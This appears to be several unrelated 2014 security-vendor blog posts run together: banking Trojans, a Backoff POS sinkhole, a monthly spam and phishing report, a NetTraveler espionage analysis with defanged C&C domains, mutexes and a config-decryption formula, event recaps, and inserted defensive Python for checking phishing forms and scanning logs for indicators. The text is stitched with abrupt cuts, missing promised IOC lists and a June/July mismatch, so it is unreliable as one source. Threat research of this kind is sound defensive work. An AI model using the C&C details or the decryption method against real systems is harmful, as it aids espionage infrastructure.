Banking Trojans bring their operators large profits. These programs are designed to steal money from users' bank accounts using distance banking systems. Malware of this type steals users' authentication data for online banking systems. Usually this is not enough as almost all banks and payment systems require authentication using several factors - entering an SMS code, inserting a USB key etc. In these cases the Trojan waits until the user makes a payment using internet banking and then changes the payment details, diverting the money to special accounts from which the criminal can cash out. There are other ways around two factor authentication: the Trojan might intercept messages with single use passwords or freeze the system at the moment the USB key is inserted, leaving the user powerless while the criminals hijack the operation and steal the money.
Finally, another profitable business is running botnets. The infected computers in a botnet can, unnoticed, be used by the evildoers for various money-making activities: mining bitcoins, sending spam, carrying out DDoS attacks, and boosting sites' ratings through search requests.
Counteracting threats
As we have already shown, internet threats are diverse and can threaten users almost anywhere — when reading their mail, interacting on social networks, checking the news or simply surfing. There are also many ways to protect against these threats, but they can be summarized in four key pieces of advice:
- Always pay attention to what you are doing on the Internet: which sites you visit, which files you download and what you run on your computer.
- Do not trust messages from unknown users and organizations, do not click on links and do not open attachments.
- Regularly update frequently-used software, especially software that works with your browser.
- Install up-to-date defenses and keep anti-virus databases current.
It all sounds very simple, but the growing number of infections clearly demonstrates that too many users fail to take their safety seriously and neglect to follow this advice. We hope that our overview of current internet threats will help improve the situation.
There is currently a lot of buzz about the Backoff point-of-sale Trojan that is designed to steal credit card information from computers that have POS terminals attached.
Although very thorough, the existing public analyses of Backoff are missing a very relevant piece of information: the command-and-control (C&C) servers. However, if you have access to the samples it isn't hard to extract this information. At the end of this document, you can find a full list together with other IOCs (indicators of compromise).
Backoff malware configuration, with C&Cs
We sinkholed two C&C servers that Backoff samples used to communicate with their masters. These C&C servers are used by certain samples that were compiled from January - March 2014. Over the past few days, we observed over 100 victims in several countries connecting to the sinkhole.
Statistics:
There were several interesting victims among them:
- A global freight shipping and transport logistics company with headquarters in North America.
- A U.K.-based charitable organization that provides support, advice and information to local voluntary organizations and community groups.
- A payroll association in North America.
- A state institute connected with information technology and communication in Eastern Europe.
- A liquor store chain in the U.S.
- An ISP in Alabama, U.S.
- A U.S.-based Mexican food chain.
- A company that owns and manages office buildings in California, U.S.
- A Canadian company that owns and operates a massive chain of restaurants.
There are also a lot of home user lines, mostly in the U.S. and Canada, connecting to the sinkhole. This is to be expected as many smaller businesses generally tend to run those rather than dedicated corporate connections.
Conclusions
The success of Backoff paints a very bleak picture of the state of point-of-sale security. Our sinkhole covers less than 5% of the C&C channels and the sinkholed domains only apply to certain Backoff samples that were created in the first quarter of this year. Yet, we've seen more than 85 victims connecting to our sinkhole.
Most of these victims are located in North America and some of them are high profile. Taking into account the U.S. Secret Service statement, it's a pretty safe bet that the number of Backoff infections at businesses in North America is well north of 1,000.
Since its appearance last year, Backoff has not changed dramatically. The author created both non-obfuscated and obfuscated samples. This was likely done to defeat the security controls on the targeted networks. However, the defenses running on a PoS terminal and/or network should not have been affected by this. This speaks volumes about the current state of PoS security, and other cybercriminals are sure to have taken note.
It's very clear that PoS networks are prime targets for malware attacks. This is especially true in the US, which still doesn't support EMV chip-enabled cards. Unlike magnetic strips, EMV chips on credit cards can't be easily cloned, making them more resilient. Unfortunately, the US is adopting chip and signature, rather than chip and PIN. This effectively negates some of the added security EMV can bring.
This may prove another costly mistake. Not adopting EMV along with the rest of the world is really haunting retail in the U.S. and the situation is not likely to change anytime soon.
IOCs / C&Cs:
Trojan file paths:
Festive spam in July was largely dedicated to the holy month of Ramadan. Unwanted correspondence also included offers to send promotional messages to users' phones and email boxes. We also came across fraudulent emails asking for help with investments. There were offers of beauty products and services too.
Ramadan
In July, spammers continued to exploit the holy month of Ramadan by offering mass mailing services. The emails were written in English. The subject and the text of the emails attracted readers with special offers and discounts in honor of the main Muslim holiday. Mass mailings advertising SMS distribution to residents of the United Arab Emirates were sent from free email services and designed in the same style. The emails used different text fonts and provided different contact details: for example, the phone numbers in the body of the message and in the subject of the email were different. Some emails indicated the site of a company engaged in SMS-marketing.
"Nigerian" scammers did not bother to invent anything new either and tried to attract users' attention by wishing them a Happy Ramadan both in the subject of the email and in the body of the message. Fraudulent emails that offered impressive rewards for help in investing money in a business project were circulated in both English and Arabic.
Current spam flows often include emails in different languages. In particular there has been an increase in the number of messages in Semitic languages, including Arabic, over the year. At the same time the scammers use English in the subject of the emails rather than Arabic. This is probably because English is more widespread and they hope an English subject will attract more readers.
One of the emails was written allegedly on behalf of a Muslim mother. It mentioned the complicated political situation in Syria and explained that this made it impossible to safely invest money at home. In this case, the content of the message suggests the author must know Arabic so a text in this language can be used to make it look more credible.
Among July's major mailings there was a notable campaign offering a variety of skin care products for women as well as promotions for beauty clinics. Spam mailings were used to sell different cleansers, anti-wrinkle creams, "elixirs of youth" and other cosmetic products. The scammers offered product samples to convince the user of their merits and promised to return the money if the results were unsatisfactory. The fraudsters tried to encourage potential customers by promising quick and free shipping to any country.
Beauty clinics were actively offering laser hair removal procedures at considerable discounts or even free of charge to supposed lottery winners. The sales pitch, complete with pictures, focused on the pressing need for this procedure before relaxing on the beach. Sometimes these emails were "noised" with texts that had nothing to do with the advertised goods and services. In some cases, this "noise" took up half the message (see the example below). The senders' names in these emails were a randomly generated combination of letters and numbers. The names of advertised centers and clinics were also mentioned in the body of the message to make it easier to find them via the search engine. However the links in the emails led to spammer parked sites registered on newly created domains. Sometimes they offered similar goods or services; sometimes they promoted completely different ones.
The heat of the summer has warmed up the market for products that help us to cool down: spam traffic actively promoted sun-protection foil for windows, fans and air conditioners, including repair and maintenance services. We often came across emails advertising water coolers and bottled water. Water was offered with special summer discounts and free delivery to homes and offices, while an extra bonus promised a free basket of fruit with every order in July or August. Placing an order was as simple as calling the number in the advert.
Sunglasses were among the most popular summer offers. Knock-offs of designer sunglasses were offered at huge discounts compared to the original. Such emails often contained the designer logos and included icons of different social networks where the company is officially represented. However, these icons were merely decorative and offered no link to these sites. They were simply intended to make the email seem more realistic. Once users clicked on the link in the email, they were redirected to a newly created online sunglasses store. The names of the sites often included the words 'glasses' or 'sunglasses'. Sometimes you could even visually identify the distorted name of the glasses brand in the random set of letters and numbers which comprised the address of the site.
Statistics
The percentage of spam in email traffic
The percentage of spam in email traffic averaged 67%, which is 2.2 percentage points up from June. The highest spam levels were seen during the second week of the month (67.6%), and the lowest levels were seen in the first week (66%).
Percentage of spam in email traffic
The geographical distribution of spam sources
In July, the list of the most popular sources of spam around the world looked like this:
Sources of spam around the world
The USA took first place (15.3%) after its percentage increased 2.2 percentage points from the previous month. Next, Russia came in second place with 5.6%; the amount of spam originating in that country was down 1.4 percentage points. China was in third place with 5.3% having produced 0.3 pp less spam than in June.
Argentina was in 4th position with 4.2% of all distributed spam; its contribution remained practically unchanged but the country still climbed one place in the rankings. It is followed by Ukraine (4.1%) with a 0.9 pp rise compared to June.
In July, we saw a 1.8 pp reduction in the amount of spam from Vietnam (3.5%), which pushed this country from 4th to 8th place.
France rounded off the Top 10 with 2.63% of all distributed spam, having pushed India (2.59%) to 11th position.
Malicious attachments in email
The graphic below shows the Top 10 malicious programs spread by email in July.
The Top 10 malicious programs spread by email
This time the rating was topped by Trojan.Win32.Yakes.fize, the Trojan downloader Dofoil. This program downloads a malicious file on the victim computer, runs it, steals the user's personal information (especially passwords) and forwards it to the fraudsters.
The notorious Trojan-Spy.HTML.Fraud.gen dropped out of top spot for the first time in many months. Readers may remember that this is the threat that appears as an HTML phishing website and sends emails disguised as important notifications from banks, online stores, and other services.
Next came Trojan.JS.Redirector.adf which is the HTML page containing code to redirect users to a scammer site offering downloads of Binbot, the service for automatic sales of binary options which are currently very popular in the Internet. This malicious program is distributed via email attachments.
It is followed by Backdoor.Win32.Androm.enji. This malicious program is a modification of Andromeda – Gamarue, a universal modular bot which is a basis for building a botnet with a variety of features. The functionality of the bot can be expanded using a system of plugins that are loaded by the criminals as required.
Fifth position is occupied by Trojan-Banker.Win32.ChePro.ink. This downloader appears in the form of a CPL applet (a component of the control panel) and, as is typical for this type of malware, it downloads Trojans developed to steal bank information and passwords. These banking Trojans mainly target online customers of Brazilian and Portuguese banks.
Trojan-Ransom.Win32.Cryptodef.ny ended 8th in July. This malicious program encrypts files on computers, blocks the screen and asks the user to pay to restore the files.
Rounding off the Top 10 was Trojan.Win32.Bublik.cran. The main functionality of the Bublik malware family is the unauthorized download and installation of new versions of malware onto victim computers.
Distribution of email antivirus detections by country
July's Top 3 remained unchanged from June. Germany accounted for 11.7% of all antivirus detections and topped the rating (+4.71 percentage points). The USA was second with 9.82% (+0.28 pp). The UK was third with 6.9% (+0.10 percentage points).
India (5.16%) overtook Brazil (3.94%) and came fourth having increased its share by 0.54 percentage points. Italy moved up two steps to 5th in the rating (+1.2 pp).
Russia increased its contribution by 1.37 percentage points averaging 3.40% of all antivirus detections and climbing from 13th to 8th position.
The UAE saw a noticeable drop in antivirus detections – a 1.09 pp fall saw it lose six places on the ranking.
The July Top 20's newcomer was Poland which occupied 19th place with 1.42% of all antivirus detections.
The percentage of email antivirus detections in other countries did not change significantly in June.
Special features of malicious spam
In July, we saw an increase in the number of fake Portuguese-language notifications sent on behalf of the popular smartphone messenger WhatsApp.
In another case, the fake message notified the recipient that after months of hard work WhatsApp for PC could now enable users to chat with friends in real time via their computer. To add to the intrigue the message claimed that 11 people had already sent friend requests to the recipient. To find out who these 11 people were, the user had to download the latest version of the Messenger for PC by clicking on the link in the email. Noticeably, we have been registering different versions of this message since the beginning of 2014.
As in the previous cases, instead of the desired program the user received a ZIP archive which contained the dropper Trojan-Dropper.Win32.Dapato.egel. Its task is to connect to a remote Brazilian host then download and run a Trojan banker designed to steal the user's financial data. The dropper also copies itself to C:\Documents and Settings\Administrator\Local Settings\Application Data\ under the name of BaRbEcuE.exe. There it creates a file called windataup.inf, in which it indicates its presence and states the current date. Finally it writes itself into the AutoRun, ensuring it is launched automatically.
Phishing
In July 2014, Kaspersky Lab's anti-phishing component registered 20,157,877 detections.
Phishers attacked users in Brazil most often: at least once during the month the Anti-Phishing component of the system was activated on computers of 18.17% of Brazilian users. This surge in activity is probably related to the football World Cup that took place in the country in June and July.
The geography of phishing attacks*, June 2014
* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users
Top 10 countries by the percentage of attacked users:

    Country              % of users
 1  Brazil               18.17
 2  India                12.99
 3  Australia            11.10
 4  France               10.73
 5  Kazakhstan           10.62
 6  UK                   10.15
 7  UAE                  10.14
 8  Dominican Republic   10.11
 9  Canada                9.61
10  Ukraine               9.53

Targets of attacks by organization
The statistics on phishing targets are based on detections of Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page for which no information is yet included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning about a potential threat.
In our previous reports we referred to the Top 100 organizations when analyzing the most attractive targets for phishing attacks. In July, we analyzed the statistics for all organizations that were attacked.
In July, the Global Internet portals category continued to top the rating of organizations most often attacked by phishers (29.49%) although its share decreased by 2.67 pp. Social networks came second with 14.61%, a 3.2 pp decline from the previous month.
Organizations most frequently targeted by phishers, by category – July 2014
Below is a similar chart for the previous month:
Organizations most frequently targeted by phishers, by category – June 2014
Financial phishing accounted for 41.85% of all attacks, a 7.86 pp increase on the previous month. The shares of detections affecting Banks, Online stores and E-payment systems were up 2.25, 2.64 and 2.29 pp respectively. The most significant rise was for PayPal, whose share grew by 2.27 pp to 3.24% in July.
We came across an interesting example of PayPal phishing at the end of the month. The fraudulent email informed the recipient of an incoming payment from a "Craiglist" user (most likely a misspelling of Craigslist, the classified ads site), but said the money could not be transferred because of an error with the PayPal account.
The email came from an address that does not belong to PayPal. In addition, it is impersonal, which is a typical feature of a phishing email.
To solve the problem, the user was asked to immediately download the attached form, open it and fill it in.
The form was created using the design elements of the PayPal site
The attackers are phishing for the user's email address and its password, full name, date of birth, mother's maiden name, postal address, credit card number, expiry date and CVV, as well as any Verified by Visa or MasterCard SecureCode passwords. Such detailed personal information would make it easy for fraudsters to rob the user of all their electronic savings.
If you look at the HTML code of the page, you can see that all the data entered in the form is sent to a page that has nothing to do with PayPal.

Top 3 organizations most frequently targeted by phishers:

    Organization     % of detections
    1  Google Inc       11.64
    2  Facebook          9.64
    3  Windows Live      6.28
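The check described above, looking at where the form actually submits, can be automated. The following is an added example (not code from the report or from Kaspersky Lab) that parses the HTML of such an attachment with Python's standard library and flags any form whose action points at a host outside the brand's own domain. The HTML is a constructed sample; the host update-verify-center.example in it is hypothetical.

```python
"""
Added example (not from the original report): given the HTML of a phishing
"form" attachment, find every <form> and flag those whose action URL does not
resolve to the brand's own domain. The sample HTML below is constructed for
illustration; the host "update-verify-center.example" is hypothetical.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: styled like a PayPal form but posting somewhere else.
SAMPLE_HTML = """
<html><body>
<img src="https://www.paypalobjects.com/webstatic/logo.png">
<form method="post" action="http://update-verify-center.example/pp/verify.php">
  <input name="email"><input name="password" type="password">
  <input name="ccnum"><input name="cvv">
</form>
<form action="https://www.paypal.com/signin">
  <input name="q">
</form>
</body></html>
"""


class FormCollector(HTMLParser):
    """Collect the action attribute and the field names of each <form>."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action": str, "fields": [...]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action", ""), "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(attrs.get("name", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_belongs_to(url, brand_domain):
    """True if the URL's host is brand_domain itself or a subdomain of it.
    A suffix match on the whole label ("." + domain) avoids being fooled by
    look-alikes such as paypal.com.evil.example."""
    host = (urlsplit(url).hostname or "").lower()
    return host == brand_domain or host.endswith("." + brand_domain)


def find_offsite_forms(html, brand_domain="paypal.com"):
    """Return (action, field_names) for each form that submits to a host
    outside brand_domain. Relative or empty actions are skipped: they post
    back to the page's own origin, which for a local attachment is not a
    remote host."""
    parser = FormCollector()
    parser.feed(html)
    offsite = []
    for form in parser.forms:
        action = form["action"]
        if not action or not urlsplit(action).scheme:
            continue
        if not host_belongs_to(action, brand_domain):
            offsite.append((action, form["fields"]))
    return offsite


if __name__ == "__main__":
    for action, fields in find_offsite_forms(SAMPLE_HTML):
        print("off-brand form action:", action, "collects", fields)
```

Run it against the saved attachment instead of SAMPLE_HTML to get the destination host of the stolen data; that host, not the branding in the page, is the indicator worth blocking or reporting.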
In July, Google services were most heavily targeted by phishing links: their share made up 11.64% of all Anti-Phishing component detections.
The number of fraudulent links to Windows Live, the global portal for Microsoft services (including Outlook), grew significantly in July. The attractiveness of this resource for fraudsters is easily explained by the popularity of Microsoft's services and, especially, by the fact that they are all accessed from a single account. Phishing pages are usually designed as an Outlook login page (currently there is also a fake login page for live.com).
An example of the phishing page imitating the Outlook entry page
Interestingly, many recent phishing pages still use the old Hotmail design despite the fact that Outlook replaced it as far back as the beginning of 2012. However, it does not seem to worry users very much: they still jump at the bait of such phishing pages.
An example of phishing on live.com using the outdated Hotmail design

Conclusion
The proportion of spam in global email traffic in July increased 2.2 percentage points and averaged 67%.
Spam emails advertising services that would send messages to users' phones and emails tried to capitalize on the Ramadan festivities while new customers were lured with holiday discounts and favorable offers. "Nigerian" scammers spread emails in English and Arabic asking for assistance in investing money. There were also offers of beauty products and services.
In July, the list of the most popular sources of spam around the world was topped by the US (15.3%), Russia (5.6%) and China (5.3%).
In July 2014, Kaspersky Lab's anti-phishing component registered 20,157,877 detections. Phishers attacked users in Brazil most often: the component was triggered at least once during the month on the computers of 18.2% of Brazilian users. The Global Internet portals category continued to top the rating of organizations most often attacked by phishers (29.5%). Financial phishing accounted for 41.85% of all attacks, a 7.86 pp increase on the previous month.
The rating of the most popular malicious attachments distributed via email was topped by Trojan.Win32.Yakes.fize. Germany remains the country with the highest number of antivirus detections (11.7%).
A significant number of malicious attachments imitated fake notifications in Portuguese allegedly sent on behalf of the popular smartphone messenger WhatsApp. These attachments targeted the financial data of users in Brazil and Portugal.
Last week, GReAT LatAm had the pleasure of participating in the Fourth Latin American Security Analysts Summit in Cartagena, Colombia. We were joined by 29 journalists from 12 different countries throughout the region and a guest speaker. This is one of our favorite events as it presents a rare opportunity to discuss ongoing research with journalists one-on-one and address security concerns at a regional level. The LatAm focus of the event allows us to examine the 'latin flavor' of cybercrime and cyberespionage originating within our borders.
The Summit was divided into two days. The first day involved presentations ranging from the evolution of the threat landscape to issues involving wearable devices, the disturbing trend of 'camfecting', and new tendencies in Brazilian trojan bankers now aided by cooperation with Eastern European cybercriminals. The second day largely revolved around APTs and cyberespionage campaigns as well as mobile threats affecting integration with the cloud.
The ever-charismatic Fabio Assolini discussed a favorite topic of his, the development of banking trojans in his native Brazil. The country is known for its carder culture and widespread cybercrime. Interesting figures presented included the correlation between the cost of Zeus and Carberp and their infection rates in the region: we witness an exorbitant rise in the rate of infection once their respective source codes leak, which effectively eliminates the criminals' initial investment. Fabio also unveiled the link between Brazilian and Eastern European cybercriminals, who are now exchanging knowledge through online resources to enhance their crimes.
Our very own Santiago Pontiroli took to the stage to discuss mobile- and cloud-based attack vectors in a presentation rife with Orwellian parallels and forewarnings. Santiago discussed Latin America's proclivity for piracy and pornography as presenting massive opportunities for cybercriminals fully willing to exploit them.
Android, a platform enjoying wide adoption in the region, is also an increasingly appealing target for cybercriminals, as evidenced by the fact that 98% of mobile malware detected in 2013 was aimed at Android devices, a figure that doubled in the first quarter of 2014! Many of these devices are now integrated with the cloud, which breathes new life into old phishing schemes whose pay-off now includes extensive access to personal data, storage, and even real-time location information. Some criminals have gone so far as to misuse manufacturer recovery services to act as pre-installed ransomware.
Roberto Martinez and I took on the topic of wearable technologies, increasingly popular devices that collect all kinds of stats about their users, store personal information, and are designed to be worn continuously. I focused on the Samsung Galaxy Gear 2 smartwatch and the ease with which it can be misused by deviants in the 'creepshots' community, as rooting and executing a handful of commands disables camera alerts and recording limitations. Roberto focused on Google Glass whose integrated wifi capability leaves it susceptible to tried-and-true sniffing to expose some of the traffic being relayed to the device.
We emphasized that the very design of wearable devices tends to embolden well-known attack methods, since users have limited access to information about altered applications or suspicious connections. Because wearables function by linking to a mobile device, they could eventually become an interesting vehicle for persistent attacks: they interact with the information on our phones without being subject to the security measures of their master devices.
Evolving Threats in Cyberespionage
On the cyberespionage front, we saw two thought-provoking and exciting presentations:
We were joined by Jaime Blasco, Director of Research at AlienVault and a close friend of GReAT. Jaime gave an overview of APT campaigns over the past decade, the measures developed to understand them, and the traits that help categorize the work of recurring nation-state players.
Dmitry Bestuzhev announced GReAT's discovery of the first ever cyberespionage campaign of Latin American origin! The Machete campaign affected military, diplomatic, and governmental institutions in 15 countries, primarily Venezuela, Ecuador, and Colombia. Interestingly, though LatAm has been considered by many as lacking the infrastructure for sustained cyberespionage, research revealed that the campaign has been active since 2010.
Finally, no Kaspersky event would be complete without an active entertainment day for all participants. We retreated to the Cartagena Golf Club for an afternoon of activities ranging from kayaking and beach volleyball to cocktail-making, dance lessons, and guided flower arrangements, as well as a massage area. The evening concluded with a gala dinner accompanied by the traditional music and dances of Colombia and closing words from our thoughtful organizers. I hope you can join us next year!
For more follow me on twitter: @juanandres_gs
Earlier this year, we observed an uptick in the number of attacks against Uyghur and Tibetan supporters using an updated version of the NetTraveler backdoor.
Here's an example of a targeted spear-phishing e-mail directed at Uyghur activists in March 2014.
The e-mail has two attachments, a non-malicious JPG file and a 373 KB Microsoft Word .DOC file.

    File name  Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki ashkarilanmaqta.doc
    MD5        b2385963d3afece16bd7478b4cf290ce
    Size       381,667 bytes

The .DOC file, which in reality is a "Single File Web Page" container, also known as a "Web archive file", appears to have been created on a system using Microsoft Office - Simplified Chinese.
It contains an exploit for the CVE-2012-0158 vulnerability, detected by Kaspersky Lab products as Exploit.MSWord.CVE-2012-0158.db.
If run on a vulnerable version of Microsoft Office, it drops the main module as "net.exe" (detected by Kaspersky Lab products as Trojan-Dropper.Win32.Agent.lifr), which in turn installs a number of other files. The main C&C module is dumped into "%SystemRoot%\system32\Windowsupdataney.dll" (detected by Kaspersky as Trojan-Spy.Win32.TravNet.qfr).

    Name  WINDOWSUPDATANEY.DLL
    MD5   c13c79ad874215cfec8d318468e3d116
    Size  37,888 bytes
It is registered as a service (named "Windowsupdata") through a Windows Batch file named "DOT.BAT" (detected by Kaspersky Lab products as Trojan.BAT.Tiny.b):
To make sure the malware isn't running multiple times, it uses the mutex "SD_2013 Is Running!" to mark its presence in the system. Other known mutexes used by older and current variants include:
- Boat-12 Is Running!
- DocHunter2012 Is Running!
- Hunter-2012 Is Running!
- NT-2012 Is Running!
- NetTravler Is Running!
- NetTravler2012 Is Running!
- SH-2011 Is Running!
- ShengHai Is Running!
- SD2013 is Running!
The malware configuration file is written to the "SYSTEM" folder (as opposed to SYSTEM32) and has a slightly different format compared to "older" NetTraveler samples:
For the record, here's what an older NetTraveler config file looks like:
Obviously, the developers behind NetTraveler have taken steps to try to hide the malware's configuration. Luckily, the encryption is relatively simple to break.
The algorithm is as follows:
decrypted[i]=encrypted[i] - (i + 0xa);
Once decrypted, the new config looks like this:
One can easily see the command-and-control (C&C) server in the screenshot above, which is "uyghurinfo[.]com".
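The transform given above, as an added example (this is not the analysts' own tool): a Python implementation of decrypted[i] = encrypted[i] - (i + 0xa) on byte values, with the inverse transform so the routine can be exercised on constructed input. The sample plaintext imitates only a key=value layout and is not a real NetTraveler configuration; the field name host= is an assumption made for the sample.

```python
"""
Added example (not code from the NetTraveler analysis itself): the byte-wise
transform the post describes, decrypted[i] = encrypted[i] - (i + 0xa), with
the arithmetic taken modulo 256 as it is on byte values, plus its inverse so
the routine can be checked on a constructed sample. SAMPLE_PLAINTEXT is
constructed and only imitates a key=value layout; it is not a real
NetTraveler configuration and the "host=" field name is an assumption.
"""


def nettraveler_decrypt(encrypted: bytes) -> bytes:
    """Subtract (index + 0x0a) from every byte, wrapping at 256."""
    return bytes((b - (i + 0x0A)) & 0xFF for i, b in enumerate(encrypted))


def nettraveler_encrypt(plain: bytes) -> bytes:
    """Inverse transform; used here only to build test data."""
    return bytes((b + (i + 0x0A)) & 0xFF for i, b in enumerate(plain))


def extract_c2_hosts(config: bytes) -> list:
    """Pull the values of host/server/url keys out of a decrypted key=value
    config. The key names are an assumption for the sample layout."""
    hosts = []
    for line in config.splitlines():
        key, sep, value = line.partition(b"=")
        if sep and key.strip().lower() in (b"host", b"server", b"url"):
            hosts.append(value.strip().decode("ascii", "replace"))
    return hosts


# Constructed sample, defanged with "[.]" like the indicator in the post.
SAMPLE_PLAINTEXT = b"host=uyghurinfo[.]com\nport=80\npath=/news/index.asp\n"
SAMPLE_ENCRYPTED = nettraveler_encrypt(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    plain = nettraveler_decrypt(SAMPLE_ENCRYPTED)
    print(plain.decode())
    print("C&C:", extract_c2_hosts(plain))
```

Because the subtrahend depends only on the position, identical bytes at different offsets encrypt differently, which is why the stored config no longer shows readable strings even though no key is involved; once the offset is known, every byte decrypts independently.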
We identified several samples using this new encryption scheme. A list of all the extracted C&C servers can be found below:

    C&C server        IP                  IP location                                                  Registrar
    ssdcru[.]com      184.108.40.206      Hong Kong, Albert Heng, Trillion Company                     SHANGHAI MEICHENG TECHNOLOGY
    uygurinfo[.]com   220.127.116.11      United States, Los Angeles, Integen Inc                      TODAYNIC.COM INC.
    samedone[.]com    18.104.22.168       Hong Kong, Kowloon, Hongkong Dingfengxinhui Bgp Datacenter   SHANGHAI MEICHENG TECHNOLOGY
    gobackto[.]net    22.214.171.124      Hong Kong, Sun Network (Hong Kong) Limited                   SHANGHAI MEICHENG TECHNOLOGY
    worksware[.]net   N/A                 N/A                                                          SHANGHAI MEICHENG TECHNOLOGY
    jojomic[.]com     was 126.96.36.199   Hong Kong, Sun Network (Hong Kong) Limited                   SHANGHAI MEICHENG TECHNOLOGY
    angellost[.]net   was 188.8.131.52    Hong Kong, Hung Tai International Holdings                   SHANGHAI MEICHENG TECHNOLOGY
    husden[.]com      was 184.108.40.206  Hong Kong, Hung Tai International Holdings                   SHANGHAI MEICHENG TECHNOLOGY
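One way to act on the indicator list above in detection as well as at the firewall: an added example (not part of the original post) that refangs the domains and matches them, subdomains included, against DNS or proxy log lines. The log lines and their format are constructed for illustration and do not imitate any particular product.

```python
"""
Added example (not part of the original post): refang the defanged C&C
indicators from the table above and match them against DNS or proxy log
lines. The log lines below are constructed; their layout (timestamp,
client IP, event) is an assumption, not a real product's format.
"""
import re

# Indicators as published, defanged with "[.]" so they are not clickable.
DEFANGED_C2 = [
    "ssdcru[.]com", "uygurinfo[.]com", "samedone[.]com", "gobackto[.]net",
    "worksware[.]net", "jojomic[.]com", "angellost[.]net", "husden[.]com",
]


def refang(indicator: str) -> str:
    """Turn 'evil[.]com' back into 'evil.com', lower-cased and without a
    trailing dot, so it compares equal to names as they appear in logs."""
    return indicator.replace("[.]", ".").replace("(.)", ".").lower().rstrip(".")


C2_DOMAINS = {refang(d) for d in DEFANGED_C2}

# Hostname-looking tokens: one or more labels, then an alphabetic TLD.
_NAME_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)


def matches_c2(name: str) -> bool:
    """True if name is a C&C domain or a subdomain of one; a C&C domain
    used as a prefix of some other name (ssdcru.com.evil.example) does not
    match."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in C2_DOMAINS)


def scan_log(lines):
    """Return (line_number, matched_name) for each line that references a
    C&C domain. Every hostname-looking token is checked, so the same
    function works on DNS query logs and on proxy logs carrying full URLs."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name in _NAME_RE.findall(line):
            if matches_c2(name):
                hits.append((n, name.lower()))
                break
    return hits


# Constructed sample log lines.
SAMPLE_LOG = [
    "2014-03-12T08:01:13Z 10.0.0.23 query A www.kaspersky.com",
    "2014-03-12T08:01:15Z 10.0.0.23 query A uygurinfo.com.",
    "2014-03-12T08:02:40Z 10.0.0.41 GET http://update.gobackto.net/news.asp",
    "2014-03-12T08:03:02Z 10.0.0.41 query A mail.example.org",
]

if __name__ == "__main__":
    for n, name in scan_log(SAMPLE_LOG):
        print(f"line {n}: contact with C&C domain {name}")
```

Matching on the domains rather than the listed IPs is deliberate: three of the entries are marked "was", so the addresses have already changed, while the registered names are what the samples carry in their configuration.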
We recommend blocking all these hosts in your firewall.

Conclusion
This year, the actors behind NetTraveler celebrate 10 years of activity. Although the earliest samples we have seen appear to have been compiled in 2005, there are certain indicators that point to 2004 as the year when their activity started.
For 10 years NetTraveler has been targeting various sectors, with a focus on diplomatic, government and military targets.
NetTraveler victims by industry
Most recently, the main focus of interest for cyber-espionage activities revolved around space exploration, nano-technology, energy production, nuclear power, lasers, medicine and communications.
The targeting of Uyghur and Tibetan activists remains a standard component of their activities and we can assume it will stay this way, perhaps for another 10 years.
The end of each summer always gets me excited, because one of my favorite events is taking place: the Internet Law Summer School organized by ELSA - The European Law Students' Association. This summer school is the perfect opportunity to meet young, smart and talented law students and discuss privacy, security or internet threats with them.
These students will become the lawyers, prosecutors and judges of tomorrow, so it is very important for them to come into contact with the real-world problems of fighting cyber-crime and ensuring the security and privacy of personal data.
Fighting cyber-crime through all means possible has always been our mission here at Kaspersky Lab. But we can't do this alone. Sure, our products and technologies are protecting hundreds of millions of users worldwide, but stopping cyber-crime is something we can not do just by ourselves.
Cyber-crime is a huge problem worldwide and it is always very frustrating to see that those responsible for cyber-attacks very rarely have to face the consequences of their actions. In the last 24 hours, we've discovered more than 300,000 new viruses, trojans and worms. How many cyber-criminals have received prison sentences in the same 24-hour period?
The reason why cyber-criminals usually get away with their crimes is that both law enforcement and judicial systems around the world are having a hard time trying to keep up with the evolution of technology, or threats on the internet specifically. This is why it's so important to train law enforcement officers. This is why it's so important to train judges and prosecutors. At the end of the day, they are the ones actually fighting cyber-crime by sending cyber-criminals to jail.
This year, the main focus of the summer school was on freedom of media and private life. I focused on the privacy and security side, of course - with a workshop titled "Private life in cyberspace - securing your personal data online".
My main message? Trust and use encryption in order to thwart prying eyes - but don't forget that no matter how good the encryption you're using is, an insecure operating system will always offer the attacker the chance of accessing your data before it gets encrypted. You can't have privacy without first having good security.
Very often new terms get over-hyped in the IT security industry. At the moment we can find articles about how hackers and researchers find vulnerabilities in, for example, cars, refrigerators, hotels or home alarm systems. All of these things go under the term IoT (Internet of Things), and it's one of the most hyped topics in the industry. The only problem with this kind of research is that we cannot really relate to it: it's pretty cool, detailed research, but if you as a reader cannot relate to the attacks, the research is not understood in the proper way.
We often try to predict the future with proactive research, and I think it can be important to try to predict the future and conduct proactive security research. But I think it's even more important to talk about what's relevant, and talk about threats that people can relate to. I started to think about this topic, and figured that if we can't secure ourselves against current threats, what good will it do to identify potential new future threats?
Threats are around us right now, while you're reading this. As users in a connected digital environment we need to ask ourselves 'What's the current threat level?' and 'How vulnerable am I?', especially when we start building small home office networks. A typical modern home can have around five devices connected to the local network which aren't computers, tablets or cellphones. I'm talking about devices such as a smart TV, printer, game console, network storage device and some kind of media player/satellite receiver.
I decided to start a research project and conduct research which I thought was relevant, trying to identify how easy it would be to hack my own home. Are the devices connected to my network vulnerable? What could an attacker actually do if these devices were compromised? Is my home 'hackable'? Before I started my research I was pretty sure that my home was pretty secure; I mean, I've been working in the security industry for over 15 years, and I'm quite paranoid when it comes to applying security patches, etc. I reckoned there must be other homes that are much more hackable than mine, because I don't really have a lot of 'hi-tech' kit at home.
